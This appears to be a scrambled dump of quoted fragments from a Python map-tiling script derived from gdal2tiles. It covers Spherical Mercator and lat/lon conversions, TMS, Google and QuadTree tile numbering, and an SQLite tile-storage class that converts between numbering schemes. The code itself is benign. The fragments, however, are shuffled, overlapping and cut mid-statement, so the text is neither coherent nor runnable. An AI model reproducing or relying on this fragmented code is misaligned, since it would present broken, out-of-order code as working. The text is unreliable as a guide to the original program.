Tile Map", "by two initialResolution = 20037508.342789244 * 2 / 256 = 156543.03392804062 What is", "math.pi * 6378137) / (self.tileSize * 2**zoom) return self.initialResolution / (2**zoom) def ZoomForPixelSize(self,", "closest to the pixelSize.\" for i in range(MAXZOOMLEVEL): if pixelSize > self.Resolution(i): if", "19288 2010-04-02 18:36:17Z rouault $\" class SqliteTileStorage(): \"\"\" Sqlite files methods for simple", "z < self.minzoom: self.minzoom = z if self.maxzoom is None or z >", "is in the middle of extent. In fact you can calculate the constant", "self.pending_images) self.pending_images = [] self.db.commit() def readImage(self, x, y, z) : \"\"\" read", "self.initialResolution = 2 * math.pi * 6378137 / self.tileSize # 156543.03392804062 for tileSize", "x zz= z yy= 2**zz - y im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def createOSMFromTMS(self, targetname, overwrite=False):", "ORIGINAL, come with no warranty # <NAME> # input: vrt file (-addalpha) in", "--------- -- TMS / \\ <-> | | <-> /----/ <-> Google \\", "are treated as if the were on the WGS84 ellipsoid. From MSDN documentation:", "/ res mapSize = self.tileSize << zoom return px, mapSize - py def", "ty, zoom) minLat, minLon = self.MetersToLatLon(bounds[0], bounds[1]) maxLat, maxLon = self.MetersToLatLon(bounds[2], bounds[3]) return", "raster itself is the same (equal extent, projection, pixel size), there is just", "the origin of pixel coordinates to top-left corner\" # # mapSize = self.tileSize", "self.db.commit() def writeImageFile(self, x, y, z, f) : \"\"\" write a single tile", "(pixels/meter) for pyramid with EPSG:900913? whole region is on top of pyramid (zoom=0)", "pyramid (zoom=0) covered by 256x256 pixels tile, every lower zoom level resolution is", "def TileLatLonCorners(self, tx, ty, zoom ): p1_lat, p1_lon, p3_lat, p3_lon = self.TileLatLonBounds(tx, ty,", "my = math.log( math.tan((90 + lat) * math.pi / 360.0 )) / (math.pi", "= int( math.ceil( py / float(self.tileSize) ) - 1 ) return tx, ty", "in the bottom-left corner, id is XYZ. Google placed the origin [0,0] to", "of global tiles used on the web. It contains classes implementing coordinate conversions", "\"\"\" CREATE TABLE IF NOT EXISTS tiles ( x int, y int, z", "file, overwrite or not if already exists\"\"\" self.filename=filename CREATEINDEX=True if overwrite: if os.path.isfile(self.filename):", "# We don't want to scale up def GoogleTile(self, tx, ty, zoom): \"Converts", "3857 projection (projection is forced due # to weird effect in AutoCreateWarpedVRT) #", "\"\"\") cur.execute( \"\"\" CREATE TABLE IF NOT EXISTS info ( desc TEXT, tilenumbering", "filename, basedir, overwrite=False) : \"\"\" Create a new sqlite file from a z/y/x.ext", "mx = lon * self.originShift / 180.0 my = math.log( math.tan((90 + lat)", "im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def createTMSFromOSM(self, targetname, overwrite=False): \"\"\" Create a new sqlite with TMS", "maxLat, maxLon ) def TileLatLonCorners(self, tx, ty, zoom ): p1_lat, p1_lon, p3_lat, p3_lon", "region in given pixel coordinates\" tx = int( math.ceil( px / float(self.tileSize) )", "projection is degined as EPSG:3785. WKT definition is in the official EPSG database.", ": print (\"None found\") return None def createFromDirectory(self, filename, basedir, overwrite=False) : \"\"\"", "as: 2 * math.pi * 6378137 / 2.0 $ echo 180 85 |", "#****************************************************************************** # From $Id: gdal2tiles.py 19288 2010-04-02 18:36:17Z rouault $ # VERSION MODIFIED", "BigPlanet one\"\"\" target=SqliteTileStorage('TMS') target.create(targetname, overwrite) cur = self.db.cursor() cur.execute(\"select x, y, z from", "target=SqliteTileStorage('OSM') target.create(targetname, overwrite) cur = self.db.cursor() cur.execute(\"select x, y, z from tiles\") res", "int, y int, z int, s int, image blob, PRIMARY KEY(x,y,z,s)) \"\"\") cur.execute(", "f=open(basedir+'/'+zs+'/'+'/'+xs+'/'+ys) self.writeImageFile(x, y, z, f) #cur.execute('insert into tiles (z, x, y,image) \\ #", "by <NAME> on 2008-07-03. Google Summer of Code 2008, project GDAL2Tiles for OSGEO.", "projection. The spherical projection causes approximately 0.33 percent scale distortion in the Y", "existing file\"\"\" self.filename=filename if os.path.isfile(self.filename): self.db = sqlite3.connect(self.filename) return True else: return False", "+= 1 if (ty & mask) != 0: digit += 2 quadKey +=", "<NAME> # input: vrt file (-addalpha) in 3857 projection (projection is forced due", "class GlobalMercator(object): \"\"\" TMS Global Mercator Profile --------------------------- Functions necessary for generation of", "p2_lon, _ , _ = self.TileLatLonBounds(tx+1, ty, zoom) p4_lat, p4_lon, _, _ =", "form of projection, not the ellipsoidal form. Since the projection is used only", "!= 0: digit += 1 if (ty & mask) != 0: digit +=", "math.exp( lat * math.pi / 180.0)) - math.pi / 2.0) return lat, lon", "is always divided by two initialResolution = 20037508.342789244 * 2 / 256 =", "sqlite3.Binary(image))) if self.minzoom is None or z < self.minzoom: self.minzoom = z if", "if overwrite: if os.path.isfile(self.filename): os.unlink(self.filename) else: if os.path.isfile(self.filename): CREATEINDEX=False self.db = sqlite3.connect(self.filename) cur", "if res: image = str(res[0]) return image else : print (\"None found\") return", "zoom): \"Converts pixel coordinates in given zoom level of pyramid to EPSG:900913\" mapSize", "using WGS84 datum, yeh? Yes, all lat/lon we are mentioning should use WGS84", "self.PixelsToTile( px, py) def TileBounds(self, tx, ty, zoom): \"Returns bounds of the given", "cur.fetchone() if res: image = str(res[0]) return image else : print (\"None found\")", "numbering scheme from a OSM/Bing/Googlemaps one\"\"\" target=SqliteTileStorage('TMS') target.create(targetname, overwrite) cur = self.db.cursor() cur.execute(\"select", "+lon_0=0.0 +x_0=0.0 +y_0=0 +k=1.0 +units=m +nadgrids=@null +no_defs Human readable WKT format of EPGS:900913:", "\"Initialize the TMS Global Mercator pyramid\" self.tileSize = tileSize self.initialResolution = 2 *", "px, py) def TileBounds(self, tx, ty, zoom): \"Returns bounds of the given tile", "xx= x zz= z yy= 2**zz - y im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def createOSMFromTMS(self, targetname,", "os import math __version__ = \"$Id: gdal2tiles.py 19288 2010-04-02 18:36:17Z rouault $\" class", "in os.listdir(basedir+'/'+zs+'/'+'/'+xs+'/'): yy=int(ys.split('.')[0]) print (zz, yy, xx) z=zz x=xx y=yy print (basedir+'/'+zs+'/'+'/'+xs+'/'+ys) f=open(basedir+'/'+zs+'/'+'/'+xs+'/'+ys)", "zoom XYZ from TMS EPSG:4326 EPSG:900913 .----. --------- -- TMS / \\ <->", "2**zz - y im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) # ============================================================================= # ============================================================================= # ============================================================================= __doc__globalmaptiles =", "* self.originShift / 180.0 my = math.log( math.tan((90 + lat) * math.pi /", "= 2 * math.pi * 6378137 / self.tileSize # 156543.03392804062 for tileSize 256", "zz=int(zs) for xs in os.listdir(basedir+'/'+zs+'/'): xx=int(xs) for ys in os.listdir(basedir+'/'+zs+'/'+'/'+xs+'/'): yy=int(ys.split('.')[0]) print (zz,", ") mx = px * res - self.originShift my = py * res", "direction, which is not visually noticable. How do I create a raster in", "pyramid with EPSG:900913? whole region is on top of pyramid (zoom=0) covered by", "pyr, zoom): \"Converts pixel coordinates in given zoom level of pyramid to EPSG:900913\"", "1 << (i-1) if (tx & mask) != 0: digit += 1 if", "targetname, overwrite=False): \"\"\" Create a new sqlite with OSM/Bing/Googlemaps numbering scheme from a", "self.filename=filename if os.path.isfile(self.filename): self.db = sqlite3.connect(self.filename) return True else: return False def close(self):", "res = cur.fetchall() for (x, y, z) in res: xx= x zz= 17", "): \"Returns bounds of the given tile in latutude/longitude using WGS84 datum\" bounds", "OSM/Bing/Googlemaps numbering scheme from a TMS one\"\"\" target=SqliteTileStorage('OSM') target.create(targetname, overwrite) cur = self.db.cursor()", "is available under the open-source GDAL license (www.gdal.org). \"\"\" MAXZOOMLEVEL = 32 class", "pixel coordinates in given zoom level of pyramid to EPSG:900913\" mapSize = self.tileSize", "): \"Converts TMS tile coordinates to Microsoft QuadTree\" quadKey = \"\" ty =", "- py def MetersToTile(self, mx, my, zoom): \"Returns tile for given mercator coordinates\"", "zoom) p2_lat, p2_lon, _ , _ = self.TileLatLonBounds(tx+1, ty, zoom) p4_lat, p4_lon, _,", "maps of those web mapping applications. Pixel and tile coordinates are in TMS", "py = self.MetersToPixels( mx, my, zoom) return self.PixelsToTile( px, py) def TileBounds(self, tx,", "Summer of Code 2008, project GDAL2Tiles for OSGEO. In case you use this", "p3_lat, p3_lon, p4_lat, p4_lon) def Resolution(self, zoom ): \"Resolution (meters/pixel) for given zoom", "of pyramid to EPSG:900913\" mapSize = self.tileSize << zoom py = mapSize -", "only for map display, and not for displaying numeric coordinates, we don't need", "0: digit += 1 if (ty & mask) != 0: digit += 2", "from a file \"\"\" self.writeImage(x, y, z, f.read()) def writeImage(self, x, y, z,", "cur = self.db.cursor() cur.execute(\"select x, y, z from tiles\") res = cur.fetchall() for", "to weird effect in AutoCreateWarpedVRT) # 2 bands: 1 grayscale, one alpha mask", "y,s,image) \\ values (?,?,?,?,?)', self.pending_images) self.pending_images = [] self.db.commit() def readImage(self, x, y,", "overwrite or not if already exists\"\"\" self.filename=filename CREATEINDEX=True if overwrite: if os.path.isfile(self.filename): os.unlink(self.filename)", "- z yy= 2**zz - y -1 im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def createTMSFromOSM(self, targetname, overwrite=False):", "one alpha mask import sqlite3 import os import math __version__ = \"$Id: gdal2tiles.py", "def createOSMFromTMS(self, targetname, overwrite=False): \"\"\" Create a new sqlite with OSM/Bing/Googlemaps numbering scheme", "so in fact lat/lon coordinates on sphere are treated as if the were", "maxy = self.PixelsToMeters( (tx+1)*self.tileSize, (ty)*self.tileSize, zoom ) return ( minx, miny, maxx, maxy", "= 20037508.342789244 * 2 / 256 = 156543.03392804062 What is the difference between", "difference between TMS and Google Maps/QuadTree tile name convention? The tile raster itself", "by Spherical Mercator, so in fact lat/lon coordinates on sphere are treated as", "datum\" bounds = self.TileBounds( tx, ty, zoom) minLat, minLon = self.MetersToLatLon(bounds[0], bounds[1]) maxLat,", "lat = (my / self.originShift) * 180.0 lat = 180 / math.pi *", "thousand kilometers, the coordinate origin is in the middle of extent. In fact", "name convention? The tile raster itself is the same (equal extent, projection, pixel", "What is the difference between TMS and Google Maps/QuadTree tile name convention? The", "2 / 256 = 156543.03392804062 What is the difference between TMS and Google", "\"\"\" cur = self.db.cursor() cur.execute(\"select image from tiles where x=? and y=? and", "for i in range(zoom, 0, -1): digit = 0 mask = 1 <<", "with BigPlanet numbering scheme from a TMS one\"\"\" target=SqliteTileStorage('BigPlanet') target.create(targetname, overwrite) cur =", "comes from the circumference of the Earth in meters, which is 40 thousand", "\"Returns bounds of the given tile in latutude/longitude using WGS84 datum\" bounds =", "z, image) : \"\"\" write a single tile from string \"\"\" if (x,", "= None self.maxzoom = None self.written = set() self.db.commit() self.pending_images = [] def", "# return px, mapSize - py def MetersToTile(self, mx, my, zoom): \"Returns tile", "EPSG:3785, OSGEO:41001. Such tiles are compatible with Google Maps, Microsoft Virtual Earth, Yahoo", "your product, translate it to another language or find it usefull for your", "gdalwarp, cs2cs or gdaltransform. All of the tools supports -t_srs 'epsg:900913'. For other", "extent return tx, (2**zoom - 1) - ty def QuadTree(self, tx, ty, zoom", "to another language or find it usefull for your project please let me", "createBigPlanetFromTMS(self, targetname, overwrite=False): \"\"\" Create a new sqlite with BigPlanet numbering scheme from", "Spherical Mercator EPSG:900913\" mx = lon * self.originShift / 180.0 my = math.log(", "for zs in os.listdir(basedir): zz=int(zs) for xs in os.listdir(basedir+'/'+zs+'/'): xx=int(xs) for ys in", "targetname, overwrite=False): \"\"\" Create a new sqlite with TMS numbering scheme from a", "y, z)) res = cur.fetchone() if res: image = str(res[0]) return image else", "should use WGS84 Geodetic Datum. Well, the web clients like Google Maps are", "range(zoom, 0, -1): digit = 0 mask = 1 << (i-1) if (tx", "public WebMapService Web Clients TileMapService What is the coordinate extent of Earth in", "<-> Meters <-> Pixels <-> Tile WGS84 coordinates Spherical Mercator Pixels in pyramid", "used on the web. It contains classes implementing coordinate conversions for: - GlobalMercator", "zoom level resolution is always divided by two initialResolution = 20037508.342789244 * 2", "the constant as: 2 * math.pi * 6378137 / 2.0 $ echo 180", "y, z, f) : \"\"\" write a single tile from a file \"\"\"", "and convert coordinates with PROJ.4? You can use standard GIS tools like gdalwarp,", "y -1 im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def createTMSFromBigPlanet(self, targetname, overwrite=False): \"\"\" Create a new sqlite", "y im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) # ============================================================================= # ============================================================================= # ============================================================================= __doc__globalmaptiles = \"\"\" globalmaptiles.py", "<< zoom # return px, mapSize - py def MetersToTile(self, mx, my, zoom):", "x zz= z yy= 2**zz - y im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) # ============================================================================= # =============================================================================", "res: xx= x zz= z yy= 2**zz - y im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) # =============================================================================", "ty def QuadTree(self, tx, ty, zoom ): \"Converts TMS tile coordinates to Microsoft", "a raster in EPSG:900913 and convert coordinates with PROJ.4? You can use standard", "x, y,s,image) \\ values (?,?,?,?,?)', self.pending_images) self.pending_images = [] self.db.commit() def readImage(self, x,", "cur = self.db.cursor() cur.execute(\"select image from tiles where x=? and y=? and z=?\",", "mx, my def MetersToPixels(self, mx, my, zoom): \"Converts EPSG:900913 to pyramid pixel coordinates", "effect in AutoCreateWarpedVRT) # 2 bands: 1 grayscale, one alpha mask import sqlite3", "overlay them on top of base maps of those web mapping applications. Pixel", "= self.PixelsToMeters( (tx+1)*self.tileSize, (ty)*self.tileSize, zoom ) return ( minx, miny, maxx, maxy )", "tile storage..', (?))\", (self.type, )) self.minzoom = None self.maxzoom = None self.written =", "zoom ): \"Converts TMS tile coordinates to Microsoft QuadTree\" quadKey = \"\" ty", "XY point from Spherical Mercator EPSG:900913 to lat/lon in WGS84 Datum\" lon =", "my, zoom) return self.PixelsToTile( px, py) def TileBounds(self, tx, ty, zoom): \"Returns bounds", "which is not visually noticable. How do I create a raster in EPSG:900913", "pyramid pixel coordinates in given zoom level\" res = self.Resolution( zoom ) px", "zoom ): \"Returns bounds of the given tile in latutude/longitude using WGS84 datum\"", "Earth, Yahoo Maps, UK Ordnance Survey OpenSpace API, ... and you can overlay", "we are mentioning should use WGS84 Geodetic Datum. Well, the web clients like", "Map Service (TMS) Profiles ============================================================== Functions necessary for generation of global tiles used", "if the were on the WGS84 ellipsoid. From MSDN documentation: To simplify the", "XYZ. Microsoft is referencing tiles by a QuadTree name, defined on the website:", "Virtual Earth, Yahoo Maps, UK Ordnance Survey OpenSpace API, ... and you can", "of the Earth in meters, which is 40 thousand kilometers, the coordinate origin", "the extent return tx, (2**zoom - 1) - ty def QuadTree(self, tx, ty,", "two initialResolution = 20037508.342789244 * 2 / 256 = 156543.03392804062 What is the", "extra precision of an ellipsoidal projection. The spherical projection causes approximately 0.33 percent", "of base maps of those web mapping applications. Pixel and tile coordinates are", "py) def TileBounds(self, tx, ty, zoom): \"Returns bounds of the given tile in", "= \"$Id: gdal2tiles.py 19288 2010-04-02 18:36:17Z rouault $\" class SqliteTileStorage(): \"\"\" Sqlite files", "was used. Class is available under the open-source GDAL license (www.gdal.org). \"\"\" MAXZOOMLEVEL", "identification of the same raster tile. Tiles in TMS are counted from [0,0]", "The lat/lon coordinates are using WGS84 datum, yeh? Yes, all lat/lon we are", "y, z, f.read()) def writeImage(self, x, y, z, image) : \"\"\" write a", "tiles More info at: http://wiki.osgeo.org/wiki/Tile_Map_Service_Specification http://wiki.osgeo.org/wiki/WMS_Tiling_Client_Recommendation http://msdn.microsoft.com/en-us/library/bb259689.aspx http://code.google.com/apis/maps/documentation/overlays.html#Google_Maps_Coordinates Created by <NAME> on 2008-07-03.", "to the pixelSize.\" for i in range(MAXZOOMLEVEL): if pixelSize > self.Resolution(i): if i!=0:", "can overlay them on top of base maps of those web mapping applications.", "/ | | /--------/ QuadTree ----- --------- /------------/ KML, public WebMapService Web Clients", "= set() self.db.commit() self.pending_images = [] def open(self, filename) : \"\"\" Open an", "self.PixelsToMeters( (tx+1)*self.tileSize, (ty)*self.tileSize, zoom ) return ( minx, miny, maxx, maxy ) def", "Maps, Microsoft Virtual Earth, Yahoo Maps, UK Ordnance Survey OpenSpace API, ... and", "(www.gdal.org). \"\"\" MAXZOOMLEVEL = 32 class GlobalMercator(object): \"\"\" TMS Global Mercator Profile ---------------------------", "= self.MetersToLatLon(bounds[0], bounds[1]) maxLat, maxLon = self.MetersToLatLon(bounds[2], bounds[3]) return ( minLat, minLon, maxLat,", "mx, my, zoom): \"Converts EPSG:900913 to pyramid pixel coordinates in given zoom level\"", "know. My email: klokan at klokan dot cz. I would like to know", "Global Mercator pyramid\" self.tileSize = tileSize self.initialResolution = 2 * math.pi * 6378137", "/ 2.0 $ echo 180 85 | gdaltransform -s_srs EPSG:4326 -t_srs EPSG:900913 Polar", "file\"\"\" self.filename=filename if os.path.isfile(self.filename): self.db = sqlite3.connect(self.filename) return True else: return False def", "tileSize 256 pixels self.originShift = 2 * math.pi * 6378137 / 2.0 #", "necessary for generation of tiles in Spherical Mercator projection, EPSG:900913 (EPSG:gOOglE, Google Maps", "the same (equal extent, projection, pixel size), there is just different identification of", "from a TMS one\"\"\" target=SqliteTileStorage('OSM') target.create(targetname, overwrite) cur = self.db.cursor() cur.execute(\"select x, y,", "(measured at Equator)\" # return (2 * math.pi * 6378137) / (self.tileSize *", "z) in res: xx= x zz= z yy= 2**zz - y im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im)", "(projection is forced due # to weird effect in AutoCreateWarpedVRT) # 2 bands:", "tx*self.tileSize, (ty+1)*self.tileSize, zoom ) maxx, maxy = self.PixelsToMeters( (tx+1)*self.tileSize, (ty)*self.tileSize, zoom ) return", "in given zoom level of pyramid to EPSG:900913\" mapSize = self.tileSize << zoom", "WKT definition is in the official EPSG database. Proj4 Text: +proj=merc +a=6378137 +b=6378137", "( minx, miny, maxx, maxy ) def TileLatLonBounds(self, tx, ty, zoom ): \"Returns", "s int, image blob, PRIMARY KEY(x,y,z,s)) \"\"\") cur.execute( \"\"\" CREATE TABLE IF NOT", "int) \"\"\") if CREATEINDEX: cur.execute( \"\"\" CREATE INDEX IND ON tiles(x,y,z,s) \"\"\") cur.execute(\"insert", ", _ = self.TileLatLonBounds(tx+1, ty, zoom) p4_lat, p4_lon, _, _ = self.TileLatLonBounds(tx, ty-1,", "| gdaltransform -s_srs EPSG:4326 -t_srs EPSG:900913 Polar areas with abs(latitude) bigger then 85.05112878", "values (?,?,?,?,?)', self.pending_images) self.pending_images = [] self.db.commit() def readImage(self, x, y, z) :", "print (zz, yy, xx) z=zz x=xx y=yy print (basedir+'/'+zs+'/'+'/'+xs+'/'+ys) f=open(basedir+'/'+zs+'/'+'/'+xs+'/'+ys) self.writeImageFile(x, y, z,", "Since the projection is used only for map display, and not for displaying", "self.tileSize << zoom py = mapSize - pyr res = self.Resolution( zoom )", "scheme from a BigPlanet one\"\"\" target=SqliteTileStorage('TMS') target.create(targetname, overwrite) cur = self.db.cursor() cur.execute(\"select x,", "open-source GDAL license (www.gdal.org). \"\"\" MAXZOOMLEVEL = 32 class GlobalMercator(object): \"\"\" TMS Global", "bounds of the given tile in latutude/longitude using WGS84 datum\" bounds = self.TileBounds(", "check the exact definition of the projection: More info at http://spatialreference.org/ref/user/google-projection/ The same", "/ 2.0 # 20037508.342789244 def LatLonToMeters(self, lat, lon ): \"Converts given lat/lon in", ".----. --------- -- TMS / \\ <-> | | <-> /----/ <-> Google", "same raster tile. Tiles in TMS are counted from [0,0] in the bottom-left", "in meters, which is 40 thousand kilometers, the coordinate origin is in the", "tiles\") res = cur.fetchall() for (x, y, z) in res: xx= x zz=", "EPSG:3785) for Google Maps, Yahoo Maps, Microsoft Maps compatible tiles - GlobalGeodetic (based", "my * self.originShift / 180.0 return mx, my def MetersToLatLon(self, mx, my ):", "areas with abs(latitude) bigger then 85.05112878 are clipped off. What are zoom level", "def MetersToPixels(self, mx, my, zoom): \"Converts EPSG:900913 to pyramid pixel coordinates in given", "self.minzoom is None or z < self.minzoom: self.minzoom = z if self.maxzoom is", "with EPSG:900913? whole region is on top of pyramid (zoom=0) covered by 256x256", "is just different identification of the same raster tile. Tiles in TMS are", "6378137 / 2.0 # 20037508.342789244 def LatLonToMeters(self, lat, lon ): \"Converts given lat/lon", "# 156543.03392804062 for tileSize 256 pixels self.originShift = 2 * math.pi * 6378137", "no warranty # <NAME> # input: vrt file (-addalpha) in 3857 projection (projection", "to the top-left corner, reference is XYZ. Microsoft is referencing tiles by a", "referencing tiles by a QuadTree name, defined on the website: http://msdn2.microsoft.com/en-us/library/bb259689.aspx The lat/lon", "top of base maps of those web mapping applications. Pixel and tile coordinates", "i in range(MAXZOOMLEVEL): if pixelSize > self.Resolution(i): if i!=0: return i-1 else: return", "structure\"\"\" self.create(filename, overwrite) for zs in os.listdir(basedir): zz=int(zs) for xs in os.listdir(basedir+'/'+zs+'/'): xx=int(xs)", "with OSM/Bing/Googlemaps numbering scheme from a TMS one\"\"\" target=SqliteTileStorage('OSM') target.create(targetname, overwrite) cur =", "self.db.commit() def readImage(self, x, y, z) : \"\"\" read a single tile as", "yy, xx) z=zz x=xx y=yy print (basedir+'/'+zs+'/'+'/'+xs+'/'+ys) f=open(basedir+'/'+zs+'/'+'/'+xs+'/'+ys) self.writeImageFile(x, y, z, f) #cur.execute('insert", "(mx + self.originShift) / res py = (my + self.originShift) / res mapSize", "if CREATEINDEX: cur.execute( \"\"\" CREATE INDEX IND ON tiles(x,y,z,s) \"\"\") cur.execute(\"insert into info(desc,", "or z > self.maxzoom: self.maxzoom = z self.commitData() def commitData(self, force = False):", "range(MAXZOOMLEVEL): if pixelSize > self.Resolution(i): if i!=0: return i-1 else: return 0 #", "2 * math.pi * 6378137 / 2.0 $ echo 180 85 | gdaltransform", "It contains classes implementing coordinate conversions for: - GlobalMercator (based on EPSG:900913 =", "mask = 1 << (i-1) if (tx & mask) != 0: digit +=", "zoom): \"Converts TMS tile coordinates to Google Tile coordinates\" # coordinate origin is", "lat/lon coordinates on sphere are treated as if the were on the WGS84", "for your project please let me know. My email: klokan at klokan dot", "* 180.0 lat = (my / self.originShift) * 180.0 lat = 180 /", "conversions for: - GlobalMercator (based on EPSG:900913 = EPSG:3785) for Google Maps, Yahoo", "to XY in Spherical Mercator EPSG:900913\" mx = lon * self.originShift / 180.0", "False): if len(self.pending_images) > 500 or force: cur = self.db.cursor() cur.executemany('insert into tiles", "zoom level\" res = self.Resolution( zoom ) px = (mx + self.originShift) /", "create(self, filename, overwrite=False): \"\"\" Create a new storage file, overwrite or not if", "level\" res = self.Resolution( zoom ) px = (mx + self.originShift) / res", "same (equal extent, projection, pixel size), there is just different identification of the", "tile as string \"\"\" cur = self.db.cursor() cur.execute(\"select image from tiles where x=?", "size), there is just different identification of the same raster tile. Tiles in", "writeImageFile(self, x, y, z, f) : \"\"\" write a single tile from a", "we use the spherical form of projection, not the ellipsoidal form. Since the", "----- --------- /------------/ KML, public WebMapService Web Clients TileMapService What is the coordinate", "\"\"\" def __init__(self, tileSize=256): \"Initialize the TMS Global Mercator pyramid\" self.tileSize = tileSize", "ty = int( math.ceil( py / float(self.tileSize) ) - 1 ) return tx,", "tiles(x,y,z,s) \"\"\") cur.execute(\"insert into info(desc, tilenumbering) values('Simple sqlite tile storage..', (?))\", (self.type, ))", "= self.db.cursor() cur.execute( \"\"\" CREATE TABLE IF NOT EXISTS tiles ( x int,", "those web mapping applications. Pixel and tile coordinates are in TMS notation (origin", "come with no warranty # <NAME> # input: vrt file (-addalpha) in 3857", "-- TMS / \\ <-> | | <-> /----/ <-> Google \\ /", "mx, my ): \"Converts XY point from Spherical Mercator EPSG:900913 to lat/lon in", "\"\"\" Open an existing file\"\"\" self.filename=filename if os.path.isfile(self.filename): self.db = sqlite3.connect(self.filename) return True", "Microsoft QuadTree\" quadKey = \"\" ty = (2**zoom - 1) - ty for", "for tileSize 256 pixels self.originShift = 2 * math.pi * 6378137 / 2.0", "LatLon <-> Meters <-> Pixels <-> Tile WGS84 coordinates Spherical Mercator Pixels in", "# 20037508.342789244 def LatLonToMeters(self, lat, lon ): \"Converts given lat/lon in WGS84 Datum", ") - 1 ) ty = int( math.ceil( py / float(self.tileSize) ) -", "standard GIS tools like gdalwarp, cs2cs or gdaltransform. All of the tools supports", "+ self.originShift) / res py = (my + self.originShift) / res mapSize =", "# ============================================================================= __doc__globalmaptiles = \"\"\" globalmaptiles.py Global Map Tiles as defined in Tile", "cur.execute(\"select x, y, z from tiles\") res = cur.fetchall() for (x, y, z)", "self.pending_images = [] self.db.commit() def readImage(self, x, y, z) : \"\"\" read a", "self.writeImageFile(x, y, z, f) #cur.execute('insert into tiles (z, x, y,image) \\ # values", "Maps, Microsoft Maps compatible tiles - GlobalGeodetic (based on EPSG:4326) for OpenLayers Base", "base maps of those web mapping applications. Pixel and tile coordinates are in", "/--------/ QuadTree ----- --------- /------------/ KML, public WebMapService Web Clients TileMapService What is", "res: xx= x zz= z yy= 2**zz - y im=self.readImage(x,y,z) target.writeImage(xx,yy,zz,im) def createOSMFromTMS(self,", "are projecting those coordinates by Spherical Mercator, so in fact lat/lon coordinates on", "to scale up def GoogleTile(self, tx, ty, zoom): \"Converts TMS tile coordinates to", "are in TMS notation (origin [0,0] in bottom-left). What coordinate conversions do we", "= 2 * math.pi * 6378137 / 2.0 # 20037508.342789244 def LatLonToMeters(self, lat,", "Map and Google Earth compatible tiles More info at: http://wiki.osgeo.org/wiki/Tile_Map_Service_Specification http://wiki.osgeo.org/wiki/WMS_Tiling_Client_Recommendation http://msdn.microsoft.com/en-us/library/bb259689.aspx http://code.google.com/apis/maps/documentation/overlays.html#Google_Maps_Coordinates", "-20037508.342789244, 20037508.342789244, 20037508.342789244] Constant 20037508.342789244 comes from the circumference of the Earth in", "new sqlite with BigPlanet numbering scheme from a TMS one\"\"\" target=SqliteTileStorage('BigPlanet') target.create(targetname, overwrite)", "projection (projection is forced due # to weird effect in AutoCreateWarpedVRT) # 2", "# ============================================================================= # ============================================================================= # ============================================================================= __doc__globalmaptiles = \"\"\" globalmaptiles.py Global Map Tiles", "= self.db.cursor() cur.execute(\"UPDATE Info SET minzoom = (?), maxzoom = (?)\", (self.minzoom, self.maxzoom))", "lat * math.pi / 180.0)) - math.pi / 2.0) return lat, lon def", "Datum. Well, the web clients like Google Maps are projecting those coordinates by", "= cur.fetchall() for (x, y, z) in res: xx= x zz= z yy=", "lat/lon in WGS84 Datum\" lon = (mx / self.originShift) * 180.0 lat =", "(?), maxzoom = (?)\", (self.minzoom, self.maxzoom)) self.db.commit() def writeImageFile(self, x, y, z, f)", "/ res py = (my + self.originShift) / res mapSize = self.tileSize <<", "CREATEINDEX=True if overwrite: if os.path.isfile(self.filename): os.unlink(self.filename) else: if os.path.isfile(self.filename): CREATEINDEX=False self.db = sqlite3.connect(self.filename)", "# mapSize = self.tileSize << zoom # return px, mapSize - py def", "Survey OpenSpace API, ... and you can overlay them on top of base", "self.MetersToLatLon(bounds[0], bounds[1]) maxLat, maxLon = self.MetersToLatLon(bounds[2], bounds[3]) return ( minLat, minLon, maxLat, maxLon", "string \"\"\" if (x, y, z) in self.written: return self.written.add((x, y, z)) self.pending_images.append((z,", "x, y, sqlite3.Binary(f.read()))) def createBigPlanetFromTMS(self, targetname, overwrite=False): \"\"\" Create a new sqlite with", "xx=int(xs) for ys in os.listdir(basedir+'/'+zs+'/'+'/'+xs+'/'): yy=int(ys.split('.')[0]) print (zz, yy, xx) z=zz x=xx y=yy", "zoom ): p1_lat, p1_lon, p3_lat, p3_lon = self.TileLatLonBounds(tx, ty, zoom) p2_lat, p2_lon, _", "lat) * math.pi / 360.0 )) / (math.pi / 180.0) my = my", "generation of global tiles used on the web. It contains classes implementing coordinate", "<-> | | <-> /----/ <-> Google \\ / | | /--------/ QuadTree", "def createFromDirectory(self, filename, basedir, overwrite=False) : \"\"\" Create a new sqlite file from", "180.0 lat = (my / self.originShift) * 180.0 lat = 180 / math.pi", "in range(zoom, 0, -1): digit = 0 mask = 1 << (i-1) if", "Google Maps are projecting those coordinates by Spherical Mercator, so in fact lat/lon", "a z/y/x.ext directory structure\"\"\" self.create(filename, overwrite) for zs in os.listdir(basedir): zz=int(zs) for xs", "mapSize - py def PixelsToTile(self, px, py): \"Returns a tile covering region in", "from tiles where x=? and y=? and z=?\", (x, y, z)) res =", "# return (2 * math.pi * 6378137) / (self.tileSize * 2**zoom) return self.initialResolution", "os.listdir(basedir): zz=int(zs) for xs in os.listdir(basedir+'/'+zs+'/'): xx=int(xs) for ys in os.listdir(basedir+'/'+zs+'/'+'/'+xs+'/'): yy=int(ys.split('.')[0]) print", "FROM ORIGINAL, come with no warranty # <NAME> # input: vrt file (-addalpha)", "We don't want to scale up def GoogleTile(self, tx, ty, zoom): \"Converts TMS", "found\") return None def createFromDirectory(self, filename, basedir, overwrite=False) : \"\"\" Create a new", "i-1 else: return 0 # We don't want to scale up def GoogleTile(self,", "middle of extent. In fact you can calculate the constant as: 2 *", "minzoom int, maxzoom int) \"\"\") if CREATEINDEX: cur.execute( \"\"\" CREATE INDEX IND ON", "tile. Tiles in TMS are counted from [0,0] in the bottom-left corner, id", "cz. I would like to know where it was used. Class is available", "z=?\", (x, y, z)) res = cur.fetchone() if res: image = str(res[0]) return", "cur.fetchall() for (x, y, z) in res: xx= x zz= 17 - z", "a new sqlite with OSM/Bing/Googlemaps numbering scheme from a TMS one\"\"\" target=SqliteTileStorage('OSM') target.create(targetname,", "coordinate origin is moved from bottom-left to top-left corner of the extent return", "lat, lon def PixelsToMeters(self, px, pyr, zoom): \"Converts pixel coordinates in given zoom", 